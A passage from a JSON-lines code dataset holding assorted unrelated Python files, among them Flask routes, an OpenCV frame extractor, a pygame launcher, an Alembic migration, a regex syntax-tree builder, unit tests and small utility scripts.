submissions\n local_context = {\n 'submissions': current_user.submissions.filter(\n Submission.task_id == task.id\n ).paginate(\n per_page=app.config['RECORDS_PER_PAGE'], page=page, 
error_out=False\n )\n }\n return render_template(\n 'problems/tabs/submissions.html',\n title=f'{task.name} - Мои отправки',\n **global_context,\n **local_context\n )\n\n elif tab == 'all-submissions':\n # Tab with all submissions\n if current_user.is_admin:\n local_context = {\n 'submissions': task.submissions.order_by(\n desc(Submission.submission_date)\n ).paginate(\n per_page=app.config['RECORDS_PER_PAGE'], page=page, error_out=False\n ),\n 'show_users': True\n }\n return render_template(\n 'problems/tabs/all_submissions.html',\n title=f'{task.name} - Все отправки',\n **global_context,\n **local_context\n )\n\n abort(403)\n\n abort(404)\n","repo_name":"S1riyS/CONTESTER","sub_path":"app/blueprints/problems/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27088249462","text":"import cv2\n\n\ndef convert_video_to_images(video_path, output_folder, num_images):\n # Open the video file\n video = cv2.VideoCapture(video_path)\n\n # Get the total number of frames in the video\n total_frames = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Calculate the frame interval to extract the desired number of images\n frame_interval = total_frames // num_images\n\n # Initialize a counter for the extracted images\n image_count = 0\n frame_count = 0\n\n # Loop through the frames and extract images at the specified interval\n while video.isOpened():\n ret, frame = video.read()\n\n if not ret:\n break\n\n # Extract an image every frame_interval frames\n if image_count <= total_frames:\n image_path = f\"{output_folder}/image_{image_count}.png\"\n cv2.imwrite(image_path, frame)\n image_count += 1\n else:\n break\n # Break the loop if the desired number of images has been extracted\n # if image_count == num_images:\n # break\n\n # Release the video file\n video.release()\n\n\n# Usage example\nvideo_path = \"D:\\\\work\\\\convert-files\\\\黄金88免费游戏.mp4\"\noutput_folder = \"D:\\\\work\\\\convert-files\\\\video_frames\\\\slot-216\"\nnum_images = 100 # Change the number of images to 1\n\nconvert_video_to_images(video_path, output_folder, num_images)\n","repo_name":"sfzhanglimin/simple_tools","sub_path":"convertVideoToImages.py","file_name":"convertVideoToImages.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73769667922","text":"\"\"\"HexaMine is a game where you have to find the mines in a hexagonal grid.\"\"\"\n\n# \n\nfrom __future__ import annotations\n\n__version__ = 'beta-1.2.0'\n\nfrom dataclasses import dataclass, field\nfrom typing import ClassVar\n\nimport pygame\n\nfrom game import Game\n\n\nWINDOW_FLAGS = pygame.RESIZABLE\n\n\n@dataclass\nclass Main:\n TPS: ClassVar[int] = 60\n x_size: int = 800\n y_size: int = 600\n\n number_tick: int = field(init=False, default=0)\n\n @property\n def x_center(self) -> int:\n return self.x_size // 2\n\n @property\n def y_center(self) -> int:\n return self.y_size // 2\n\n def main(self) -> None:\n pygame.init()\n logo = pygame.image.load('assets/logo.png')\n pygame.display.set_icon(logo)\n pygame.display.set_caption(f'HexaMine {__version__}')\n canvas = pygame.display.set_mode((self.x_size, self.y_size), WINDOW_FLAGS)\n clock = pygame.time.Clock()\n\n game = Game(self, canvas)\n game.run_menu()\n\n while True:\n self.number_tick += 1\n clock.tick(self.TPS)\n game.tick_loop()\n pygame.display.update()\n for event in 
pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n return\n if event.type == pygame.VIDEORESIZE:\n self.x_size = event.w\n self.y_size = event.h\n # while we would love to have a minimum size, that literally does not work in pygame\n game.handle_event(event)\n\n\nif __name__ == '__main__':\n Main().main()\n","repo_name":"greatericontop/HexaMine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43024613844","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nDefault hosting mode to pypi-only\n\nRevision ID: 10cb17aea73\nRevises: 41abd35caa3\nCreate Date: 2015-09-03 01:18:55.288971\n\"\"\"\n\nfrom alembic import op\n\nrevision = \"10cb17aea73\"\ndown_revision = \"41abd35caa3\"\n\n\ndef upgrade():\n op.alter_column(\n \"packages\",\n \"hosting_mode\",\n server_default=\"pypi-only\",\n existing_server_default=\"pypi-explicit\",\n )\n\n\ndef downgrade():\n op.alter_column(\n \"packages\",\n \"hosting_mode\",\n server_default=\"pypi-explicit\",\n existing_server_default=\"pypi-only\",\n )\n","repo_name":"pypi/warehouse","sub_path":"warehouse/migrations/versions/10cb17aea73_default_hosting_mode_to_pypi_only.py","file_name":"10cb17aea73_default_hosting_mode_to_pypi_only.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"22014683579","text":"import typing\nfrom base import *\nfrom Lexer import Lexer, Token\n\n\nclass Node:\n pass\n\nFollowPos = typing.NewType('FollowPos', typing.Dict[Node, typing.Set[Node]])\n\nclass Node:\n root: Node\n nodes: typing.List[Node]\n value: Token\n groups: typing.List[int]\n firstposes: typing.Set[Node]\n lastposes: typing.Set[Node]\n nullables: bool or None\n \n\n def __init__(\n self, \n root: Node=None,\n value: Token=None):\n self.root = root\n self.value = value\n self.nodes = []\n self.groups = []\n self.firstposes = -1\n self.lastposes = -1\n self.nullables = -1\n \n \n def add(self, value: Token) -> Node:\n node = Node(self, value)\n self.nodes.append(node)\n return node\n\n def pop(self):\n return self.nodes.pop()\n\n def add_node(self, node: Node):\n node.root = self\n self.nodes.append(node)\n\n @property\n def last(self):\n return self.nodes[-1]\n\n @property\n def lvl(self):\n if self.root is None:\n return 0\n return self.root.lvl + 1\n\n @property\n def isNotEmpty(self):\n return not not self.nodes\n\n def leftRoot(self):\n if not self.nodes:\n yield self\n for n in self.nodes:\n n.leftRoot()\n\n def optLeftRoot(self):\n go = [t for t in self.nodes]\n while go:\n tmp = go.pop(0)\n yield tmp\n go = tmp.nodes + go\n\n def printTree(self):\n for t in self.optLeftRoot():\n print(t)\n\n def copy(self):\n return Node(self.root, self.value)\n\n def __str__(self) -> str:\n return f\"(lvl={self.lvl} id={id(self)} p={id(self.root) if self.root else self.root} v={self.value}) 
g={self.groups}\"\n \n def __repr__(self) -> str:\n return f\"(lvl={self.lvl} id={id(self)} p={id(self.root) if self.root else self.root} v={self.value}) g={self.groups}\"\n \n def genDot(self, outFile='graph'):\n s = \"digraph G {\"\n ids = set()\n obhod = [t for t in self.optLeftRoot()]\n for t in obhod:\n if t.root.value is not None:\n if id(t.root) not in ids:\n val = t.value.value\n if len(val) == 2:\n val = r'\\\\' + val\n s += f\"{id(t.root)} [label=\\\"{val}\\\"]; \"\n # s += f\"{id(t.root)} [label=\\\"{id(t.root)}\\\"]; \"\n \n ids.add(id(t.root))\n if id(t) not in ids:\n val = t.value.value\n if len(val) == 2:\n val = r'\\\\' + val\n s += f\"{id(t)} [label=\\\"{val}\\\"]; \"\n # s += f\"{id(t)} [label=\\\"{id(t)}\\\"]; \"\n ids.add(id(t))\n for t in obhod:\n if t.root.value is not None:\n s += f\"{id(t.root)} -> {id(t)}; \"\n s += \"}\"\n with open(f'./{outFile}.dot', 'w') as out:\n out.write(s)\n import subprocess\n subprocess.call(['dot', '-Tpng', f'./{outFile}.dot', '-o', f'{outFile}.png'])\n\n def copyTree(self):\n nodes = [self] + [i for i in self.optLeftRoot()]\n news = [Node() for i in range(len(nodes))]\n head = news[0]\n fc = True\n for i,n in enumerate(nodes):\n if fc:\n print(nodes[0], nodes[1])\n news[i].value = Token(n.value.tag, n.value.value)\n fc = False\n else:\n j = nodes.index(n.root)\n news[i].root = news[j]\n news[i].value = Token(n.value.tag, n.value.value)\n for node in n.nodes:\n j = nodes.index(node)\n news[i].add_node(news[j])\n h = Node()\n h.add_node(head)\n head = h\n return head\n\n def addEnd(self):\n tmp = Node(None, Token(CONCAT, '.'))\n ch = self.pop()\n tmp.add_node(ch)\n tmp.add(Token(END_MEAT, '\\$'))\n self.add_node(tmp)\n\n def checkLeft(self):\n self.printTree()\n self.genDot(\"check.png\")\n\n def prenullable(self):\n if self.value is None:\n return False\n if self.value.tag == META_NUM:\n # return False # True\n return True\n elif self.value.tag == CONCAT or self.value.tag == OR:\n return self.nodes[0].prenullable() and self.nodes[1].prenullable()\n elif self.value.tag == GROUP_BRACKET or self.value.tag == SQ_BRACKET:\n if self.nodes:\n return self.nodes[0].prenullable()\n else:\n return True\n else:\n return False\n\n def nullable(self):\n if self.nullables == -1:\n if self.prenullable():\n self.nullables = None\n else:\n if self.value.tag == EMPTY or self.value.tag == KLINI:\n self.nullables = True\n elif self.value.tag == OR:\n self.nullables = self.nodes[0].nullable() or self.nodes[1].nullable()\n elif self.value.tag == CONCAT:\n self.nullables = self.nodes[0].nullable() and self.nodes[1].nullable()\n elif self.value.tag == GROUP_BRACKET or self.value.tag == REPEATS or self.value.tag == SQ_BRACKET:\n self.nullables = self.nodes[0].nullable()\n else:\n self.nullables = False\n return self.nullables\n\n def firstpos(self):\n if self.firstposes == -1:\n if self.prenullable():\n self.firstposes = None\n else:\n if self.value.tag == EMPTY:\n self.firstposes = set()\n elif self.value.tag == KLINI:\n self.firstposes = self.nodes[0].firstpos()\n elif self.value.tag == OR:\n node0 = self.nodes[0].firstpos()\n node1 = self.nodes[1].firstpos()\n if node0 is None:\n self.firstposes = node1\n if node1 is None:\n self.firstposes = node0\n self.firstposes = node0 | node1 \n elif self.value.tag == CONCAT:\n node0 = self.nodes[0].firstpos()\n node1 = self.nodes[1].firstpos()\n if node0 is None:\n self.firstposes = node1\n if node1 is None:\n self.firstposes = node0\n if self.nodes[0].nullable():\n self.firstposes = node0 | node1\n else:\n 
self.firstposes = node0\n elif self.value.tag == GROUP_BRACKET or self.value.tag == REPEATS or self.value.tag == SQ_BRACKET:\n # if self.prenullable():\n # self.firstposes = None\n self.firstposes = self.nodes[0].firstpos()\n else:\n self.firstposes = set([id(self)])\n return self.firstposes\n\n def lastpos(self):\n if self.lastposes == -1:\n if self.prenullable():\n self.lastposes = None\n else:\n if self.value.tag == EMPTY:\n self.lastposes = set()\n elif self.value.tag == KLINI:\n self.lastposes = self.nodes[0].lastpos()\n elif self.value.tag == OR:\n node0 = self.nodes[0].lastpos()\n node1 = self.nodes[1].lastpos()\n if node0 is None:\n self.lastposes = node1\n if node1 is None:\n self.lastposes = node0\n self.lastposes = node0 | node1 \n elif self.value.tag == CONCAT:\n node0 = self.nodes[0].lastpos()\n node1 = self.nodes[1].lastpos()\n if node0 is None:\n self.lastposes = node1\n if node1 is None:\n self.lastposes = node0\n if self.nodes[1].nullable():\n self.lastposes = node0 | node1\n else:\n self.lastposes = node1\n elif self.value.tag == GROUP_BRACKET or self.value.tag == REPEATS or self.value.tag == SQ_BRACKET:\n # if self.prenullable():\n # self.lastposes = None\n self.lastposes = self.nodes[0].lastpos()\n else:\n self.lastposes = set([id(self)])\n return self.lastposes\n\n\nclass SyntaxTree:\n root_stack: typing.List[Node]\n lexer: Lexer\n followposes: FollowPos\n root: Node\n root_null: Node\n ids: typing.Dict[int, Node]\n _functors = dict\n _joiner: Node\n _df_joiner: Node\n _groups_num: int\n _sq_num: int\n _OROR: list\n\n def __init__(self):\n self.lexer = Lexer()\n self._functors = {\n GROUP_BRACKET: self.op_group_brackets,\n SQ_BRACKET: self.op_sq_brackets,\n REPEATS: self.op_uno_left,\n OR: self.change_joiner,\n KLINI: self.op_uno_left,\n META: self.op_binary_join,\n META_NUM: self.op_meta_num,\n CHAR: self.op_binary_join,\n EMPTY: self.op_binary_join\n }\n self.clear()\n\n def __join(self, n1: Node, n2: Node, root: Node):\n self._joiner.add_node(n1)\n self._joiner.add_node(n2)\n root.add_node(self._joiner)\n self._joiner = self._df_joiner.copy()\n\n def __root_concat(self, n1: Node, n2: Node):\n if n1.isNotEmpty:\n ch = n1.pop()\n self.__join(ch, n2, n1)\n else:\n n1.add_node(n2)\n\n def _isOpenBracket(self, t: Token):\n return t.value in \"([\"\n\n def op_brackets(self, t: Token):\n if self._isOpenBracket(t):\n tmp = Node(None, t)\n self.__root_concat(self.root_stack[-1], tmp)\n self.root_stack.append(tmp)\n return None\n else:\n t2 = self.root_stack.pop()\n while t2.value.tag == TMP_TOKEN:\n troot = t2.root\n troot.pop()\n troot.add_node(t2.pop())\n t2 = self.root_stack.pop()\n return t2\n\n def op_group_brackets(self, t: Token):\n tmp = self.op_brackets(t)\n if tmp:\n self._OROR.pop()\n self._groups_num += 1\n tmp.value = Token(GROUP_BRACKET, f\"gr_{self._groups_num}\")\n else:\n self._OROR.append(self.root_stack[-1])\n \n def op_sq_brackets(self, t: Token):\n tmp = self.op_brackets(t)\n if self._df_joiner.value.tag == CONCAT:\n self._df_joiner = Node(None, Token(OR, '|'))\n else:\n self._df_joiner = Node(None, Token(CONCAT, '.'))\n self._joiner = self._df_joiner.copy()\n if tmp:\n self._sq_num += 1\n tmp.value = Token(SQ_BRACKET, f\"sq_{self._sq_num}\")\n if not tmp.nodes:\n tmp.add(Token(EMPTY, '#'))\n # root = tmp.root\n # root.nodes.remove(tmp)\n # root.add_node(tmp.pop())\n # else:\n # self.op_binary_join(Token(EMPTY, '#'))\n\n def op_uno_left(self, t: Token):\n ch = self.root_stack[-1].pop()\n if ch.nodes:\n ch2 = ch.pop()\n tmp = ch.add(t)\n 
tmp.add_node(ch2)\n self.root_stack[-1].add_node(ch)\n else:\n tmp = self.root_stack[-1].add(t)\n tmp.add_node(ch)\n\n def op_binary_join(self, t: Token):\n tmp = self.root_stack[-1]\n if tmp.isNotEmpty:\n self.__join(tmp.pop(), Node(None, t), tmp)\n else:\n self.root_stack[-1].add(t)\n\n def op_meta_num(self, t: Token):\n val = int(t.value)\n if val > self._groups_num:\n raise PatternError('group index out off range')\n self.op_binary_join(Token(t.tag, t.value + '/'))\n\n def change_joiner(self, t: Token):\n if t.tag == OR:\n if self._OROR:\n n1 = self._OROR.pop()\n if n1.isNotEmpty:\n n2 = Node(None, Token(TMP_TOKEN, 'TMP'))\n ch = n1.pop()\n _joiner = Node(None, t)\n _joiner.add_node(ch)\n _joiner.add_node(n2)\n n1.add_node(_joiner)\n self.root_stack.append(n2)\n self._OROR.append(n2)\n \n else:\n n1 = self.root_stack[-1]\n if n1.isNotEmpty:\n n2 = Node(None, Token(TMP_TOKEN, 'TMP'))\n ch = n1.pop()\n _joiner = Node(None, t)\n _joiner.add_node(ch)\n _joiner.add_node(n2)\n n1.add_node(_joiner)\n self.root_stack.append(n2)\n self._OROR.append(_joiner)\n else:\n raise AttributeError(\"OR_TOKEN\")\n\n def clear(self):\n self.root_stack = [Node()]\n self._df_joiner = Node(None, Token(CONCAT, '.'))\n self._joiner = self._df_joiner.copy()\n self._groups_num = 0\n self._sq_num = 0\n self.followposes = dict()\n self.ids = dict()\n self.root = None\n self._OROR = []\n self.lexer.clear()\n\n def build(self, s: str):\n gen = self.lexer.lex(s)\n for t in gen:\n self._functors[t.tag](t)\n\n if len(self.root_stack) > 1:\n raise PatternError(\"syntax tree\")\n self.root_null = self.root_stack[0]\n self.root = self.root_stack[0].nodes[0]\n # self.addGroups()\n return self.root\n\n def __addFP(self, i: Node, s: typing.Set[Node]):\n if i in self.followposes:\n self.followposes[i] = (self.followposes[i] | s)\n else:\n self.followposes[i] = s\n\n def genFollowposes(self):\n root = self.root_stack[0].nodes[0]\n for n in root.optLeftRoot():\n self.ids[id(n)] = n\n n.firstpos()\n n.lastpos()\n \n for n in root.optLeftRoot():\n if n.value.tag == CONCAT: \n for i in n.nodes[0].lastposes:\n self.__addFP(i, n.nodes[1].firstposes)\n elif n.value.tag == KLINI or n.value.tag == REPEATS: #or n.value.tag == GROUP_BRACKET \n for i in n.nodes[0].lastposes:\n self.__addFP(i, n.firstposes)\n return self.followposes, self.ids \n\n def _addGroups(self, groups: list, node):\n if node.value.tag == GROUP_BRACKET:\n groups.append(int(node.value.value[3:]))\n node.groups = groups\n for n in node.nodes:\n self._addGroups(groups.copy(), n)\n \n def addGroups(self):\n self._addGroups([], self.root)\n return self.root\n\nif __name__ == '__main__':\n tree = SyntaxTree()\n # test = r\"n[as\\{]\"\n # test = r\"asd*((geg)[]([123\\{\\]]*)){3}\"\n test = r\"(12)|b\"\n test = r\"(a|b)*abb\\$\"\n test = r\"(ba{5}){2}\"\n test = r\"[ab]{3}\"\n test = r\"[]\"\n # test = r\"ab{3}\"\n test = r\"(aba[abc]){3}\\$\"\n\n test = r\"(na*)\\1\\$\"\n # test = r\"(aba(a|b|c)){3}\\$\"\n \n # test = r\"(cab){3}\"\n \n # test = r\"(nana)|((n*[a]){3})\"\n # test = r\"(n[a])\"\n # test = r\"asd*(nad)|((cur\\{))as[123]{6}[]\\#\\2\"\n # test = r\"a|b|c|([123456]*)\"\n test = r\"(a|b)*abb\\#\"\n # test = r\"[123]\"\n # test = r\"(a|b)*abb\\#\\123123\"\n # test = r\"[]\"\n test = r\"xy|z*\"\n test = r\"(01)*|(10)*\"\n test = r\"abc*|deb[123]|kick|pick\"\n # test = r\"a*a(a[bc])*\"\n treelist = tree.build(test)\n # treelist.printTree()\n\n tree.root_null.genDot()\n # print('check')\n # tree.root_null.checkLeft()\n # print('endcheck')\n # 
print(*tree.genFollowposes(), sep='\\n\\n')\n\n h = tree.root.nodes[0].nodes[1]\n print(h)\n h2 = h.copyTree()\n h2.addEnd()\n h2.genDot(\"graph2\")\n # for k in tree.followposes:\n # print(tree.ids[k])\n # for k in treelist.optLeftRoot():\n # # print(tree.ids[k])\n # print(k)\n # print(k.firstpos(), k.lastpos(), sep='\\t')\n","repo_name":"KPEdit/AT_lab2","sub_path":"lib/SyntaxTree.py","file_name":"SyntaxTree.py","file_ext":"py","file_size_in_byte":13822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23015543800","text":"#!/usr/bin/env python\n\nimport sys, os\nimport unittest\nimport subprocess\nimport tempfile\nimport shutil\n\nsys.path.append(os.path.join(\"..\", \"lib\"))\nimport utils\n\nclass TestInstallGit(utils.ConfigInstallTest):\n @unittest.skipIf(os.getenv(\"IS_AZURE_PIPELINE\") == '1',\n \"Azure pipline has custom gitconfig\")\n def test_config(self):\n Home = os.environ[\"HOME\"]\n PkgDir = os.path.dirname(__file__)\n self.checkLinks(os.path.join(PkgDir, \"files\"), \"\", Home)\n\n @unittest.skipIf(os.getenv(\"IS_AZURE_PIPELINE\") == '1',\n \"Azure pipline has custom gitconfig\")\n def test_graph(self):\n Pwd = os.getcwd()\n Tmp = os.environ[\"TMPDIR\"]\n RepoDir = tempfile.mkdtemp()\n Env = dict(HOME=os.environ[\"HOME\"], TERM=\"xterm\")\n os.chdir(RepoDir)\n subprocess.check_call([\"git\", \"init\"])\n self.assertEqual(subprocess.call([\"git\", \"graph\"], env=Env), 0)\n shutil.rmtree(RepoDir)\n os.chdir(Pwd)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MetroWind/dotfiles-mac","sub_path":"git/test-mac.py","file_name":"test-mac.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"36584947448","text":"from flask import Flask, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef root():\n data = {\n \"nama\" : \"bintang\"\n }\n return jsonify(data)\n\nif \"__main__\" == __name__:\n app.run(host=\"0.0.0.0\", port=1000)","repo_name":"strongpapazola/unusia","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17877797132","text":"import random\nimport numpy as np\n\nfrom FCSCPA import ball_in_bowl, Ymn_Leibniz_matAB, demo_Ymn_Leibniz, demo_Ymn_Binomial, Ymn_electron_zeroK\n\nhfe = lambda x,y: np.max(np.abs(x-y)/(np.abs(x)+np.abs(y)+1e-3))\n\n\ndef test_ball_in_bowl():\n def hf1(x0, x1):\n ret0 = []\n ret1 = []\n for y1,y2 in ball_in_bowl(x0, x1):\n ret0.append(y1)\n ret1.append(y2)\n return ret0, ret1\n tmp1,tmp2 = hf1(0, 3)\n assert [] == tmp1\n assert [] == tmp2\n\n tmp1,tmp2 = hf1(3, 1)\n assert [(3,)] == tmp1\n assert [(0,0,0,1)] == tmp2\n\n tmp1,tmp2 = hf1(3, 2)\n assert [(0,3),(1,2),(2,1),(3,0)] == tmp1\n assert [(1,0,0,1),(0,1,1,0),(0,1,1,0),(1,0,0,1)] == tmp2\n\n\ndef test_Ymn_Leibniz_matAB():\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 1)\n assert hfe(np.array([1]), tmp1) < 1e-7\n assert [[1,0]] == tmp2.tolist()\n\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 2)\n assert hfe(np.array([1]), tmp1) < 1e-7\n assert [[0,1]] == tmp2.tolist()\n\n tmp1,tmp2 = Ymn_Leibniz_matAB(2, 4)\n assert hfe(np.array([6,8]), tmp1) < 1e-7\n assert [[0,2],[2,0]] == tmp2.tolist()\n\n\ndef test_Ymn():\n fL = random.uniform(0, 1)\n fR = random.uniform(0, 1)\n for m in range(1, 7):\n for n in range(1, 7):\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'electron')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 
'electron')\n assert abs(tmp1-tmp2) < 1e-7\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'phonon')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 'phonon')\n assert abs(tmp1-tmp2) < 1e-7\n\n\ndef test_Ymn_electron_zeroK():\n ground_truth = [\n (1, [1]),\n (2, [1,2]),\n (3, [1,6,6]),\n (4, [1,14,36,24]),\n (5, [1,30,150,240,120]),\n ]\n for x,ret_ in ground_truth:\n ret = Ymn_electron_zeroK(x)\n assert np.all(np.array(ret_)==ret)\n","repo_name":"kaituohuo/FCSCPA","sub_path":"tests/test_Ymn_utils.py","file_name":"test_Ymn_utils.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36683476932","text":"import io\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nimport serial\n\nser = serial.Serial(\n port = \"COM3\", \n baudrate= 57600, \n parity = serial.PARITY_NONE,\n stopbits = serial.STOPBITS_ONE,\n bytesize = serial.EIGHTBITS,\n timeout = 10\n )\n\n\ndef bytes_receive():\n img_bytes = ser.readlines()\n img_bytes1 = b\"\".join(img_bytes) #リスト → 文字列 \n ser.close()\n print(\"End\")\n return img_bytes1\n \ndef convert_img(img_bytes):\n ByteToImg = Image.open(io.BytesIO(img_bytes))\n ByteToImg.save('decoded_img_01.jpg')\n \nif __name__ == '__main__':\n while True:\n Check_transfer_1 = ser.readline().strip().decode('utf-8')\n if Check_transfer_1 == 'Ready?':\n Check_transfer_2 = ser.write(b'Ready!')\n break\n\n img_bytes = bytes_receive()\n print('Receive Complete')\n img = convert_img(img_bytes)\n print('Convert Complete')\n print('All Complete')","repo_name":"Koji1116/cansat2021","sub_path":"sensor/communication/xbee_img_receive.py","file_name":"xbee_img_receive.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30154244211","text":"class Monster:\n\n def __init__(self, name, health, mana, strength, dexterity, intelligence):\n self.name = name\n self.health = health\n self.mana = mana\n self.strength = strength\n self.dexterity = dexterity\n self.intelligence = intelligence\n\n\nrat = Monster(\n \"Rat\",\n 5,\n 0,\n 3,\n 5,\n 8\n)\n\ngiant_rat = Monster(\n \"Giant Rat\",\n 5,\n 0,\n 3,\n 5,\n 10\n)\n\nskeleton = Monster(\n \"Skeleton Rat\",\n 10,\n 0,\n 8,\n 8,\n 3\n)\n\n\nnecromancer = Monster(\n \"Necromancer Rat\",\n 100,\n 100,\n 15,\n 20,\n 22\n)\n\nmydict = {\"damage\": 2}\n\n# print(skeleton.name)\n# print(f'HP = {skeleton.health}')\n# print(f'STR = {skeleton.strength}')\n# print()\n\n# for key in [\"name\", \"health\", \"mana\", \"strength\", \"dexterity\", \"intelligence\"]:\n# print(getattr(giant_rat, key, None))\n# print()\n# for key in [\"name\", \"health\", \"mana\", \"strength\", \"dexterity\", \"intelligence\"]:\n# print(getattr(skeleton, key, None))\n# print()\n# while skeleton.health > 0:\n# for key in [\"health\"]:\n# setattr(skeleton, key, skeleton.health-mydict[\"damage\"])\n# for key in [\"name\", \"health\", \"mana\", \"strength\", \"dexterity\", \"intelligence\"]:\n# print(getattr(skeleton, key, None))","repo_name":"rlyyah/rougelike_python","sub_path":"monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24912978272","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 6 09:12:59 2014\n\n@author: manu\n\"\"\"\n\nfrom numpy import *\nfrom scipy.interpolate import Rbf, InterpolatedUnivariateSpline\nimport random\nfrom 
pylab import *\n\n# setup data\nx = np.linspace(0, 10, 9)\ny = np.sin(x)\nxi = np.linspace(0, 10, 101)\n\n# use fitpack2 method\nius = InterpolatedUnivariateSpline(x, y)\nyi = ius(xi)\n\nM=360\nent=zeros((360,2))\nanglelist=list(xrange(0,360))\nfor i in range(4,M):\n x=sort(random.sample(anglelist,i))#linspace(0,360,i)\n y=randn(i)\n xi=linspace(0,360,M)\n ius = InterpolatedUnivariateSpline(x, y)\n yi = ius(xi)\n ent[i,0]=entropy(y,round(sqrt(i)))\n ent[i,1]=entropy(yi,round(sqrt(M)))\n\nplot(range(360),(ent[:,0]))\nplot(range(360),(ent[:,1]))","repo_name":"manuamador/EntropyRC","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21533111702","text":"def find_grade(s):\n \"\"\"\n :param s:\n int, your score\n :return:\n your grade\n \"\"\"\n if s < 0 or s > 60:\n return 'Invalid input'\n elif s <= 35:\n return 'Failed attempt'\n elif s <= 40:\n return 4.0\n elif s <= 45:\n return 4.5\n elif s <= 50:\n return 5.0\n elif s <= 55:\n return 5.5\n elif s <= 60:\n return 6.0\n\n\ngrade = find_grade(58)\nprint(grade)\n","repo_name":"Mario-bgt/MAT_101_Programming","sub_path":"sheet2_mario_baumgartner/ex02.3.py","file_name":"ex02.3.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20383238921","text":"import requests\n\n\ndef summarize(api_endpoint, api_key, num_sentences, text_to_summarize):\n \"\"\"\n SMMRY - text summarization API\n :param api_endpoint: string url\n :param api_key: string credential\n :param text_to_summarize: plain text article\n :param num_sentences: int of size of the summary\n :return: requests.Response\n \"\"\"\n url = \"{}/?SM_API_KEY={}&SM_LENGTH={}\".format(\n api_endpoint, api_key, num_sentences)\n data = {'sm_api_input': text_to_summarize}\n resp = requests.post(url, data=data)\n return resp\n","repo_name":"bryand1/textsummarization","sub_path":"api/smmry.py","file_name":"smmry.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"490476419","text":"def _matching_providers(target_or_targets, name_or_provider):\n \"\"\"Returns a list of the given provider from one or more targets.\n\n This function supports legacy providers (referenced by name) and modern\n providers (referenced by their provider object).\n\n Args:\n target_or_targets: A target or list of targets whose providers should be\n searched.\n name_or_provider: The string name of the legacy provider or the reference\n to a modern provider to return.\n Returns:\n A list of providers from the given targets. 
This list may have fewer\n elements than the given number of targets (including being empty) if not all\n targets propagate the provider.\n \"\"\"\n if type(target_or_targets) == type([]):\n targets = target_or_targets\n else:\n targets = [target_or_targets]\n\n # If name_or_provider is a string, find it as a legacy provider.\n if type(name_or_provider) == type(\"\"):\n return [getattr(x, name_or_provider) for x in targets\n if hasattr(x, name_or_provider)]\n\n # Otherwise, find it as a modern provider.\n return [x[name_or_provider] for x in targets if name_or_provider in x]\n\n\n# Define the loadable module that lists the exported symbols in this file.\nprovider_support = struct(\n matching_providers=_matching_providers,\n)\n","repo_name":"shamanskyh/rules_apple","sub_path":"apple/bundling/provider_support.bzl","file_name":"provider_support.bzl","file_ext":"bzl","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"30416056601","text":"def f_gold ( str ) :\n n = len ( str )\n dp = [ [ 0 ] * ( n + 1 ) ] * ( n + 1 )\n for i in range ( 1 , n + 1 ) :\n for j in range ( 1 , n + 1 ) :\n if ( str [ i - 1 ] == str [ j - 1 ] and i != j ) :\n dp [ i ] [ j ] = 1 + dp [ i - 1 ] [ j - 1 ]\n else :\n dp [ i ] [ j ] = max ( dp [ i ] [ j - 1 ] , dp [ i - 1 ] [ j ] )\n return dp [ n ] [ n ]\n\n\n#TOFILL\n\nif __name__ == '__main__':\n param = [\n ('JxZFz',),\n ('7648992235770',),\n ('11100000',),\n 